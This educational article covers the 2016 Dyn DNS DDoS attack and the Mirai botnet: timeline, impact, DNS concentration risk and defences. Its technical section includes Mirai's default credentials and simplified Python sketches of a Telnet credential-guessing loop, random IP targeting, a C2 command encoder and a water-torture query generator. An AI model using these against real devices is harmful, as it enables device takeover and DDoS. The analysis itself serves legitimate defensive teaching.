The Dyn DNS DDoS Attack and Mirai Botnet (2016)
On the morning of October 21, 2016, the internet broke. Not a single website or service, but a vast swath of the web's most-visited properties — Twitter, Netflix, Reddit, GitHub, Spotify, CNN, The New York Times, and dozens more — became unreachable for millions of users across the United States and Europe. The cause was not a cable cut or a software bug. It was an army of compromised security cameras, DVRs, and home routers, welded into a weapon called the Mirai botnet, aimed squarely at a single target: Dyn, one of the internet's most important managed DNS providers.
The Dyn attack was a watershed moment for the internet. It exposed how a critical piece of infrastructure — DNS — could become a catastrophic single point of failure, and it demonstrated that the billions of cheap, insecure IoT devices entering the world were not merely a nuisance but a genuine threat to the stability of the global network.
What is Dyn? Understanding the Target
Dyn (whose acquisition by Oracle was announced in November 2016, just weeks after the attack) was a managed DNS provider. When you type twitter.com into your browser, your device needs to resolve that domain name into an IP address before it can connect. Twitter, like many large websites, did not run its own authoritative DNS infrastructure — it outsourced that function to Dyn. Dyn's servers were the authoritative source for translating twitter.com (and thousands of other domains) into IP addresses.
This meant that if Dyn's DNS servers could not respond to queries, none of the domains they hosted could be resolved. The websites themselves were still running. The servers behind Twitter, Reddit, and Spotify were up, their BGP routes were still being announced, and their autonomous systems were fully operational. But users could not reach them, because the DNS layer that translates names to addresses had been knocked offline.
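To make this dependency concrete, the sketch below does what a recursive resolver must do: look up a domain's NS records, then query one of those authoritative servers directly. It assumes the third-party dnspython package (pip install dnspython); example.com is a placeholder domain.

```python
# Resolve a domain the way a recursive resolver must: find the
# authoritative nameservers, then ask one of them directly.
import dns.message
import dns.query
import dns.resolver

domain = "example.com"  # placeholder

# Step 1: discover the zone's authoritative nameservers via NS records.
ns_names = [str(r.target) for r in dns.resolver.resolve(domain, "NS")]
print("Authoritative servers:", ns_names)

# Step 2: query one authoritative server directly for an A record.
# If every server in this set stops answering (as Dyn's did during
# the attack), resolution fails even though the website itself is up.
ns_ip = str(dns.resolver.resolve(ns_names[0], "A")[0])
query = dns.message.make_query(domain, "A")
response = dns.query.udp(query, ns_ip, timeout=3)
for rrset in response.answer:
    print(rrset)
```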
The Mirai Botnet: An Army of IoT Devices
The weapon used against Dyn was the Mirai botnet, a piece of malware that specifically targeted Internet of Things (IoT) devices — IP cameras, digital video recorders (DVRs), home routers, and other embedded Linux devices. Mirai's approach was brutally simple: it scanned the internet for devices that were still using factory-default usernames and passwords, logged in via Telnet (port 23) or SSH (port 22), and installed itself.
The list of credentials Mirai tried was shockingly short — about 60 username/password combinations. Entries like admin/admin, root/root, root/123456, and admin/password were enough to compromise an estimated 100,000 or more devices worldwide. These were not sophisticated exploits against zero-day vulnerabilities. They were default passwords that manufacturers shipped with their products and that consumers never changed.
Once a device was infected, it became a soldier in the botnet, ready to flood any target with traffic on command. The device continued its normal function — the camera still recorded, the DVR still played back — so most owners had no idea their hardware had been conscripted.
Three Waves of Attack
The attack on Dyn unfolded in three distinct waves over the course of the day:
Wave 1: 11:10 UTC — Eastern US Impact
The first wave began around 11:10 UTC (7:10 AM Eastern). It targeted Dyn's DNS infrastructure serving the US East Coast. Within minutes, users on the eastern seaboard found that major websites simply would not load. DNS queries to Dyn's servers were either timing out or being dropped entirely. Dyn's engineering team began mitigating at 11:36 UTC, and service was largely restored by 13:20 UTC — about two hours after the attack began.
Wave 2: 15:50 UTC — Broader and More Sophisticated
Just as it seemed the crisis was over, a second wave struck at 15:50 UTC. This time, the attack was broader in scope and more sophisticated in technique, hitting Dyn's infrastructure from more diverse sources and targeting additional server clusters. The attack traffic was globally distributed, coming from tens of millions of IP addresses — some of which were the IoT devices under Mirai's control, but many of which were legitimate recursive resolvers whose caches had expired and were now hammering Dyn with retry queries, amplifying the chaos.
Wave 3: 20:00 UTC — The Final Push
A third wave launched around 20:00 UTC. By this point, Dyn's team had learned from the first two waves and was able to mitigate this attack more quickly. But the damage to confidence had been done. An entire day of repeated outages affecting the world's biggest websites had demonstrated a vulnerability that the internet community could not ignore.
The Scale: ~1.2 Terabits per Second
The Mirai attack on Dyn generated an estimated 1.2 Tbps (terabits per second) of attack traffic at its peak. To appreciate the scale: in 2016, the entire transatlantic cable capacity between the US and Europe was roughly 50-80 Tbps total. A single botnet was generating enough traffic to fill more than 1% of the total transatlantic bandwidth.
The attack used a mix of techniques. The majority of the traffic was DNS query floods — syntactically valid DNS queries sent at enormous volume. This was particularly insidious because the attack traffic looked like legitimate DNS queries, making it harder to filter. The botnet also used TCP SYN floods, UDP floods, and other volumetric attack methods to overwhelm Dyn's infrastructure from multiple angles simultaneously.
What made Mirai especially effective was its use of direct-path attacks rather than reflection/amplification. Earlier DDoS botnets often relied on spoofed source addresses to bounce traffic off open DNS resolvers or NTP servers. Mirai did not need to amplify — it had enough raw firepower from its hundreds of thousands of compromised devices to simply flood the target directly. Each device might contribute only a few megabits per second, but at scale, 100,000 devices contributing 10 Mbps each yields a terabit per second.
Who Went Down and Why
The list of affected sites reads like a who's-who of the internet:
- Twitter — entirely unreachable during the first wave for East Coast users
- Reddit — intermittent access failures throughout the day
- Netflix — unavailable for large portions of the US
- GitHub — intermittent DNS resolution failures
- Spotify — streaming service disrupted
- CNN, The New York Times — news sites unreachable during a critical election period
- PayPal, Airbnb, Etsy, SoundCloud, and many more
The common thread was straightforward: these organizations all relied on Dyn as their primary or sole DNS provider. Their servers were running, their network prefixes were being announced in BGP, and their CDN edges were operational. But DNS is the first step of every connection — without it, browsers had no way to discover which IP address to connect to.
Some organizations that used multiple DNS providers (or had quick failover mechanisms) weathered the attack with minimal impact. This became the single most important lesson of the day: DNS redundancy is not optional.
The Mirai Source Code Release
Weeks before the Dyn attack, on September 30, 2016, an individual using the pseudonym "Anna-senpai" released the full Mirai source code on Hackforums, an online hacking forum. The post was framed as a retirement announcement: Anna-senpai claimed that with increasing attention from the security community and law enforcement, it was time to move on.
The release had two profound consequences. First, it allowed security researchers to fully analyze how Mirai worked — its scanning logic, its hardcoded credential list, its command-and-control protocol. Second, and more dangerously, it gave every aspiring attacker a ready-made DDoS weapon. Within weeks, dozens of Mirai variants appeared, operated by different groups, competing to infect devices. The October 21 Dyn attack was carried out by one such operator.
In December 2017, three young Americans — Paras Jha, Josiah White, and Dalton Norman — pleaded guilty to creating and operating the original Mirai botnet. Their initial motivation had been to gain advantage in Minecraft server hosting disputes by DDoSing competitors. The fact that one of the most consequential cyberattacks in history originated from a Minecraft grudge match remains one of the internet's most darkly ironic episodes.
Why DNS is a Single Point of Failure
The Dyn attack forced the internet industry to reckon with an uncomfortable truth: DNS, despite being a distributed, hierarchical system in theory, can become a concentrated point of failure in practice.
DNS was designed as a distributed system. The root zone is served by 13 named root server identities (a.root-servers.net through m.root-servers.net), each replicated across hundreds of anycast instances. TLD servers are similarly distributed. But for individual domains, the authoritative DNS is whatever the domain owner configures — and many major websites concentrated that authority in a single managed DNS provider.
When Dyn went down, there was no automatic failover for its customers. DNS resolution does support multiple nameservers per domain (configured via NS records), but if all NS records point to the same provider, redundancy is an illusion. The fix is to configure authoritative DNS across multiple independent providers — so that if one is attacked, the others continue answering queries.
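A quick way to audit this is to look at where a zone's NS records actually point. The sketch below assumes the third-party dnspython package and uses a crude last-two-labels heuristic to group nameservers by provider; it flags domains whose entire NS set lives under one provider's namespace.

```python
# Group a zone's nameservers by their parent domain as a rough proxy
# for "provider". The two-label heuristic is a simplification; some
# providers operate multiple nameserver domains.
import dns.resolver

def ns_provider_domains(domain: str) -> set[str]:
    answers = dns.resolver.resolve(domain, "NS")
    providers = set()
    for rdata in answers:
        labels = str(rdata.target).rstrip(".").split(".")
        providers.add(".".join(labels[-2:]))  # keep the last two labels
    return providers

providers = ns_provider_domains("example.com")  # placeholder domain
if len(providers) < 2:
    print("WARNING: all NS records under a single provider:", providers)
else:
    print("NS records span multiple providers:", providers)
```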
How Mirai Worked: A Technical Deep Dive
Mirai's architecture was a case study in effective malware design. Although it was written by college-age programmers over petty Minecraft disputes, its engineering was surprisingly competent.
Scanning and Infection
Mirai bots continuously generated random IP addresses and attempted Telnet connections on port 23 and SSH on port 22. The scanner avoided certain IP ranges — including the US Department of Defense, IANA reserved blocks, and GE and HP corporate ranges — presumably to reduce the chance of attracting attention from well-resourced targets.
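The scanning loop is easy to picture. The sketch below captures its flavor in Python: draw random 32-bit addresses and discard any that fall in an excluded range. The exclusion list here is an illustrative subset, not Mirai's exact blacklist (the real one, visible in the leaked source, is longer).

```python
# Mirai-style target selection: random IPv4 addresses, skipping
# excluded ranges. Illustrative subset only, not the real blacklist.
import ipaddress
import random

EXCLUDED = [
    ipaddress.ip_network("0.0.0.0/8"),       # invalid source range
    ipaddress.ip_network("10.0.0.0/8"),      # private
    ipaddress.ip_network("127.0.0.0/8"),     # loopback
    ipaddress.ip_network("192.168.0.0/16"),  # private
    ipaddress.ip_network("6.0.0.0/7"),       # US Department of Defense
    ipaddress.ip_network("11.0.0.0/8"),      # US Department of Defense
]

def random_target() -> ipaddress.IPv4Address:
    # Keep drawing until the address falls outside every excluded range.
    while True:
        addr = ipaddress.IPv4Address(random.getrandbits(32))
        if not any(addr in net for net in EXCLUDED):
            return addr

print(random_target())
```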
When a connection succeeded, the bot tried credentials from its hardcoded list of ~60 username/password pairs. The list was compiled from default credentials used by manufacturers of IP cameras, DVRs, and routers. Popular entries included:
- root / xc3511 — a default used by numerous Chinese IP camera manufacturers
- root / vizxv — Dahua DVR default
- admin / admin — generic default
- root / 888888 — used by several DVR models
- root / default — common embedded Linux default
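The dictionary attack itself amounts to a short loop. The sketch below shows its shape with a heavily simplified Telnet exchange (real Telnet sessions include option negotiation, omitted here); it is illustrative rather than Mirai's actual implementation, and the same pattern is useful for auditing your own devices for default credentials.

```python
# Shape of Mirai's credential loop: try each default pair over Telnet.
# Heavily simplified; real Telnet involves option negotiation.
import socket

CREDENTIALS = [
    ("root", "xc3511"), ("root", "vizxv"), ("admin", "admin"),
    ("root", "888888"), ("root", "default"), ("admin", "password"),
]

def try_login(host: str, user: str, password: str, timeout: float = 5.0) -> bool:
    """Naive Telnet login: send credentials, look for a shell prompt."""
    try:
        with socket.create_connection((host, 23), timeout=timeout) as sock:
            sock.settimeout(timeout)
            sock.recv(1024)                        # login banner/prompt
            sock.sendall(user.encode() + b"\r\n")
            sock.recv(1024)                        # password prompt
            sock.sendall(password.encode() + b"\r\n")
            return b"#" in sock.recv(1024)         # crude root-prompt check
    except OSError:
        return False

def audit(host: str) -> None:
    for user, password in CREDENTIALS:
        if try_login(host, user, password):
            print(f"{host}: accepts default credentials {user}/{password}")
            return
    print(f"{host}: no default credentials accepted")
```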
Persistence and Competition
Once installed, Mirai ran entirely in memory. It deleted its own binary from disk and masked its process name to avoid detection. It also killed any existing malware processes on the device and blocked the Telnet port to prevent competing botnets from infecting the same device. In the IoT malware ecosystem, devices were contested territory, and Mirai aggressively defended its turf.
Command and Control
Infected devices reported to a command-and-control (C2) server, which maintained a registry of all bots and could direct them to attack specified targets. The C2 protocol was custom and lightweight, designed for devices with minimal CPU and memory. Attack commands specified the target IP, port, duration, and attack type.
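To see why a custom binary protocol suits devices with minimal CPU and memory, consider how compactly an attack command can be encoded. The layout below is hypothetical (Mirai's real wire format differs), but it shows the idea: a complete order fits in a handful of bytes that even the weakest device can parse.

```python
# Hypothetical C2 attack command encoding, in the spirit of Mirai's
# lightweight protocol. Not the real wire format.
import socket
import struct

ATTACK_UDP_FLOOD = 0          # attack-type codes are illustrative
ATTACK_SYN_FLOOD = 1
ATTACK_DNS_WATER_TORTURE = 9

def encode_command(target_ip: str, port: int, duration_s: int, attack_type: int) -> bytes:
    """Pack target IP (4 bytes), port (2), duration (4), type (1)."""
    return socket.inet_aton(target_ip) + struct.pack("!HIB", port, duration_s, attack_type)

cmd = encode_command("192.0.2.1", 53, 3600, ATTACK_DNS_WATER_TORTURE)
print(len(cmd), cmd.hex())  # 11 bytes: trivial to parse on a constrained device
```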
Attack Vectors
Mirai supported ten different DDoS attack types, including UDP floods, TCP SYN floods, ACK floods, GRE protocol floods, and DNS water torture attacks (sending queries for random subdomains of the target domain, preventing caching from absorbing the load). The DNS water torture technique was particularly effective against Dyn, because each query was unique and appeared legitimate.
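The water torture technique is simple to express. Each query carries a fresh random label, so no cache (recursive or authoritative) ever holds the answer, and every query must be serviced by the victim's nameservers. A minimal sketch, with a placeholder zone name:

```python
# Generate "water torture" query names: a fresh random label means a
# guaranteed cache miss, so every query reaches the authoritative servers.
import random
import string

def water_torture_name(victim_zone: str) -> str:
    label = "".join(random.choices(string.ascii_lowercase + string.digits, k=12))
    return f"{label}.{victim_zone}"

for _ in range(3):
    print(water_torture_name("victim.example"))  # e.g. k3x9q0a7bw2m.victim.example
```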
BGP and Network-Layer Observations
From a BGP and routing perspective, the Dyn attack was instructive because it demonstrated a class of failure that BGP cannot mitigate. The attack did not manipulate routing — it was not a BGP hijack. Dyn's prefixes remained properly announced. Their autonomous system continued advertising routes. RPKI validation, had it been universally deployed, would not have helped, because the routes were legitimate.
The attack operated at the application layer (DNS) while the network layer (BGP/IP) remained intact. This is a critical distinction. A BGP looking glass during the attack would have shown Dyn's routes as healthy — because they were. Packets were being delivered to Dyn's servers; those servers simply could not process legitimate queries amid the flood.
However, network-layer analysis was still useful for understanding the attack's sources. Traffic telemetry showed anomalous volumes from prefixes associated with IoT-heavy access networks, and BGP data helped map those prefixes to their origin autonomous systems. The downstream effects were visible too — as Dyn's servers became intermittently reachable, some DNS-based traffic engineering systems may have triggered route changes in CDN and anycast networks that depended on DNS health checks.
The Amplification Problem
Beyond the direct botnet traffic, the Dyn attack was amplified by an emergent behavior of the DNS infrastructure itself. When a recursive resolver (like those run by ISPs, or Google's 8.8.8.8) fails to get a response from an authoritative server, it retries. When millions of recursive resolvers worldwide simultaneously fail to resolve twitter.com, they all retry — generating a secondary flood of legitimate queries that compounds the original attack traffic.
Dyn reported that during the attack, they observed traffic from "tens of millions" of IP addresses. Many of these were not Mirai bots but recursive resolvers retrying failed queries. This retry amplification effect is a fundamental characteristic of DNS DDoS attacks: the attacker only needs to degrade the authoritative server's response rate enough to trigger retries from the global resolver population, which then does much of the damage for free.
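A back-of-envelope calculation shows why this effect is so powerful. The numbers below are illustrative assumptions, not measured values from the Dyn attack:

```python
# Back-of-envelope retry amplification. All numbers are assumptions.
resolvers = 10_000_000       # recursive resolvers with expired caches
retries_per_failure = 3      # typical retry count before giving up
retry_interval_s = 5         # rough spacing between retry rounds

extra_qps = resolvers * retries_per_failure / retry_interval_s
print(f"~{extra_qps:,.0f} extra queries/second from retries alone")
# The attacker pays nothing for this load: degrading the authoritative
# servers is enough to recruit the global resolver population.
```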
Aftermath and Industry Response
The Dyn attack produced immediate and lasting changes across the internet industry:
Multi-Provider DNS Became Standard
Within weeks of the attack, major websites began configuring secondary DNS providers. Organizations that had relied solely on Dyn (or any single provider) began splitting their authoritative DNS across two or more independent providers — for example, using both AWS Route 53 and Google Cloud DNS, or Cloudflare and Dyn. This ensures that a DDoS against any single provider does not take the domain fully offline.
IoT Security Came Under Scrutiny
The Mirai botnet thrust IoT security into the policy spotlight. The fact that consumer devices with unchangeable default passwords could be weaponized to take down critical infrastructure prompted regulatory discussions worldwide. In 2020, California's SB-327 IoT security law took effect, requiring manufacturers to ship each device with a unique preprogrammed password or to force users to set new credentials on first use. The UK and EU followed with similar legislation.
DDoS Mitigation Evolved
The Dyn attack accelerated investment in DDoS mitigation services. Providers like Cloudflare (AS13335) and Akamai expanded their scrubbing capacity. Anycast-based DNS services became more common, distributing authoritative DNS across dozens of global points of presence so that volumetric attacks are absorbed across the entire network rather than concentrated at a single site.
DNS Protocol Hardening
The attack reinforced interest in DNS resilience mechanisms: response rate limiting (RRL) to reduce amplification, DNS cookies (RFC 7873) to verify client identity, and aggressive NSEC caching to reduce authoritative server load for negative responses. These measures do not prevent DDoS, but they make DNS infrastructure more resistant to being overwhelmed.
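The core of response rate limiting is essentially a per-client token bucket. The toy sketch below shows the idea; real implementations such as BIND's RRL also classify responses and "slip" occasional truncated replies so legitimate clients can retry over TCP:

```python
# Toy response rate limiter: a token bucket per client IP.
import time
from collections import defaultdict

RATE = 10.0   # responses/second allowed per client
BURST = 20.0  # bucket capacity

buckets: dict[str, tuple[float, float]] = defaultdict(
    lambda: (BURST, time.monotonic())
)

def allow_response(client_ip: str) -> bool:
    tokens, last = buckets[client_ip]
    now = time.monotonic()
    tokens = min(BURST, tokens + (now - last) * RATE)  # refill over time
    if tokens >= 1.0:
        buckets[client_ip] = (tokens - 1.0, now)
        return True
    buckets[client_ip] = (tokens, now)
    return False  # drop or truncate instead of answering
```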
Mirai's Legacy: IoT Botnets Today
Mirai did not end with the convictions of its creators. The source code release ensured that Mirai's DNA lives on in dozens of successor botnets. Descendants like Mozi (which reused Mirai code), rivals like Hajime, and various unnamed forks have continued to scan for vulnerable IoT devices, updating their credential lists and adding exploits for known firmware vulnerabilities.
The IoT device population has grown enormously since 2016. Estimates put the number of connected IoT devices at over 15 billion as of 2025. While security has improved for devices from major manufacturers, the long tail of cheap, generic devices — particularly IP cameras and home routers from lesser-known brands — continues to ship with weak or hardcoded credentials.
Modern botnets also exploit known software vulnerabilities in addition to default credentials. Unpatched routers, NAS devices, and smart home equipment provide a steady supply of new recruits. The fundamental problem Mirai exposed — that the internet's infrastructure can be attacked using the aggregate bandwidth of millions of poorly secured consumer devices — has not been solved. It has only grown in scale.
Lessons for Network Architecture
The Dyn attack offers durable lessons for anyone building internet-facing services:
- Use multiple DNS providers. Configure at least two independent authoritative DNS providers for any production domain. Ensure they have separate infrastructure and autonomous systems.
- Reduce DNS TTLs strategically. Low TTLs allow faster failover but increase query volume (and thus attack surface). High TTLs reduce query volume but slow failover. Find the right balance for your traffic patterns.
- Employ anycast DNS. Anycast distributes DNS traffic across many locations, naturally absorbing DDoS attacks. Providers like Cloudflare and Google Cloud DNS use anycast extensively.
- Monitor DNS resolution externally. You cannot detect a DNS outage from inside your own network, where your servers are up and your local DNS works. Use external monitoring services that probe your domains from diverse locations (a minimal probe is sketched after this list).
- Understand your dependency chain. Map every external service your application depends on. DNS is often invisible until it fails. CDN, load balancers, certificate authorities, and API gateways are other common hidden dependencies.
- Consider DNS prefetching and caching. Applications that resolve peer-service hostnames can cache and prefetch DNS results to tolerate brief DNS outages without user-visible impact.
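As promised above, here is a minimal external probe: it resolves a domain through several public resolvers, so an authoritative-DNS failure shows up even while internal monitoring looks healthy. It assumes the third-party dnspython package; the resolver IPs are well-known public services and the domain is a placeholder.

```python
# Probe a domain through multiple public resolvers to catch
# authoritative-DNS outages that internal monitoring would miss.
import dns.exception
import dns.resolver

PUBLIC_RESOLVERS = {
    "google": "8.8.8.8",
    "cloudflare": "1.1.1.1",
    "quad9": "9.9.9.9",
}

def probe(domain: str) -> dict[str, bool]:
    results = {}
    for name, ip in PUBLIC_RESOLVERS.items():
        resolver = dns.resolver.Resolver(configure=False)
        resolver.nameservers = [ip]
        resolver.lifetime = 3.0  # total time budget per lookup
        try:
            resolver.resolve(domain, "A")
            results[name] = True
        except dns.exception.DNSException:
            results[name] = False
    return results

print(probe("example.com"))  # placeholder domain
```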
The Broader Context: DNS, BGP, and Internet Resilience
The Dyn attack sits alongside other landmark internet failures that have exposed structural vulnerabilities. The Pakistan YouTube hijack of 2008 exposed BGP's trust-based model. The 2021 Facebook outage showed what happens when a network accidentally withdraws all its own BGP routes. The Dyn attack showed that even with perfect routing, a DNS-layer failure can make vast portions of the internet appear offline.
These events are not unrelated. DNS and BGP are co-dependent systems. DNS resolvers reach authoritative servers via BGP routes. DNS-based traffic engineering (used by CDNs and anycast services) depends on correct BGP routing. A failure in either system cascades into the other. Understanding this interdependency is essential for anyone building or operating internet infrastructure.
You can explore the routing infrastructure behind DNS services using the looking glass. The networks that serve DNS for the world's largest websites are visible in BGP data — their AS paths, their peering relationships, and their prefix announcements all tell the story of how the internet's naming system is connected to its routing fabric.
Explore DNS and Routing Infrastructure
You can investigate the networks that power DNS and see how internet infrastructure is routed using the looking glass. Try these lookups to explore the systems that keep the internet's naming layer running: